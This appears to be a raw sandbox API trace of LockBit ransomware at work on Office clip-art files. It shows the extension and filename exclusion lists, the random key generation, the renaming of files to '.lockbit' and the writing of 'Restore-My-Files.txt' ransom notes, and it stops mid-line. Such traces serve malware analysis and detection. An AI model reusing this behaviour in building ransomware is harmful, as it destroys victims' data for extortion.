CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.703] malloc (_Size=0x40068) returned 0x3df0008 [0167.703] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=13184) returned 1 [0167.703] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.704] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.704] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.704] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.704] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.704] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.704] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.709] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03257_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03257_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.709] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.709] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0167.710] free (_Block=0x1fa2ed8) [0167.710] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03257_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.710] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.710] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.710] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31379600, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x6cdb1210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x31379600, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x692, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE03331_.WMF", cAlternateFileName="")) returned 1 [0167.710] lstrcmpiW (lpString1=".", lpString2="PE03331_.WMF") returned -1 [0167.710] lstrcmpiW (lpString1="..", lpString2="PE03331_.WMF") returned -1 [0167.710] PathFindExtensionW (pszPath="PE03331_.WMF") returned=".WMF" [0167.710] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.710] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.710] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.710] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.710] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.710] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.710] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.710] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.710] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.711] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.711] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.711] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.711] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.711] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.711] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.711] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.711] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.711] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.711] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.711] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.711] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.711] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.711] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.711] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.711] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.711] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.711] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.711] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.711] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.711] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.711] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.711] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.711] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.711] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.711] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.711] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.711] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.712] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.712] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.712] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.712] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.712] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.712] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.712] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.712] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.712] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.712] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.712] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE03331_.WMF") returned 1 [0167.712] lstrcmpiW (lpString1="ntldr", lpString2="PE03331_.WMF") returned -1 [0167.712] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE03331_.WMF") returned -1 [0167.712] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE03331_.WMF") returned -1 [0167.712] lstrcmpiW (lpString1="autorun.inf", lpString2="PE03331_.WMF") returned -1 [0167.712] lstrcmpiW (lpString1="thumbs.db", lpString2="PE03331_.WMF") returned 1 [0167.712] lstrcmpiW (lpString1="iconcache.db", lpString2="PE03331_.WMF") returned -1 [0167.712] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.712] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03331_.WMF") returned=".WMF" [0167.712] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.712] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.712] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.712] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.712] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.712] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.712] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.712] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.713] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.713] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.713] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.713] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.713] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.713] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.713] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.713] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.713] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.713] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.713] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.713] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.713] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.713] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.713] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.713] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.713] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.713] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.713] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.713] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.713] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03331_.WMF.lockbit") returned 72 [0167.713] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03331_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03331_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0167.715] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.715] malloc (_Size=0x40068) returned 0x3df0008 [0167.715] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1682) returned 1 [0167.715] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.716] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.716] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.716] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.716] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.716] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.716] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0167.721] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03331_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03331_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.721] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.721] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0167.721] free (_Block=0x1fa2ed8) [0167.721] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03331_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.722] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.722] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.722] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe160cb00, ftCreationTime.dwHighDateTime=0x1bd4af2, ftLastAccessTime.dwLowDateTime=0x59cdb0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe160cb00, ftLastWriteTime.dwHighDateTime=0x1bd4af2, nFileSizeHigh=0x0, nFileSizeLow=0x282c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE03339_.WMF", cAlternateFileName="")) returned 1 [0167.722] lstrcmpiW (lpString1=".", lpString2="PE03339_.WMF") returned -1 [0167.722] lstrcmpiW (lpString1="..", lpString2="PE03339_.WMF") returned -1 [0167.722] PathFindExtensionW (pszPath="PE03339_.WMF") returned=".WMF" [0167.722] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.722] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.722] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.722] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.722] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.722] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.722] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.722] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.722] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.722] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.722] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.722] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.722] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.723] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.723] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.723] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.723] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.723] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.723] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.723] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.723] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.723] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.723] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.723] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.723] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.723] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.723] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.723] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.723] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.723] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.723] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.723] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.723] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.723] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.723] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.723] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.723] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.723] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.723] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.723] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.723] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.724] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.724] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.724] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.724] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.724] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.724] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.724] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE03339_.WMF") returned 1 [0167.724] lstrcmpiW (lpString1="ntldr", lpString2="PE03339_.WMF") returned -1 [0167.724] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE03339_.WMF") returned -1 [0167.724] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE03339_.WMF") returned -1 [0167.724] lstrcmpiW (lpString1="autorun.inf", lpString2="PE03339_.WMF") returned -1 [0167.724] lstrcmpiW (lpString1="thumbs.db", lpString2="PE03339_.WMF") returned 1 [0167.724] lstrcmpiW (lpString1="iconcache.db", lpString2="PE03339_.WMF") returned -1 [0167.724] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.724] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03339_.WMF") returned=".WMF" [0167.724] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.724] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.724] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.724] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.724] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.724] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.724] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.724] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.724] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.724] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.724] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.724] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.725] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.725] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.725] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.725] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.725] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.725] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.725] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.725] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.725] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.725] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.725] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.725] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.725] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.725] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.725] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.725] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.725] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03339_.WMF.lockbit") returned 72 [0167.725] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03339_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03339_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0167.726] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.726] malloc (_Size=0x40068) returned 0x3df0008 [0167.726] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=10284) returned 1 [0167.727] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.727] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.727] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.727] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.728] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.728] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0167.733] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03339_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03339_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.733] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.733] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0167.733] free (_Block=0x1fa2ed8) [0167.733] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03339_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.733] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.733] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.733] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x59cdb0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2108, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE03451_.WMF", cAlternateFileName="")) returned 1 [0167.733] lstrcmpiW (lpString1=".", lpString2="PE03451_.WMF") returned -1 [0167.734] lstrcmpiW (lpString1="..", lpString2="PE03451_.WMF") returned -1 [0167.734] PathFindExtensionW (pszPath="PE03451_.WMF") returned=".WMF" [0167.734] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.734] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.734] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.734] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.734] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.734] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.734] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.734] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.734] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.734] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.734] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.734] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.734] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.734] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.734] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.734] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.734] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.734] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.734] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.734] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.734] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.734] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.734] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.734] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.734] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.735] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.735] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.735] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.735] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.735] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.735] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.735] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.735] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.735] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.735] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.735] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.735] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.735] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.735] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.735] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.735] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.735] 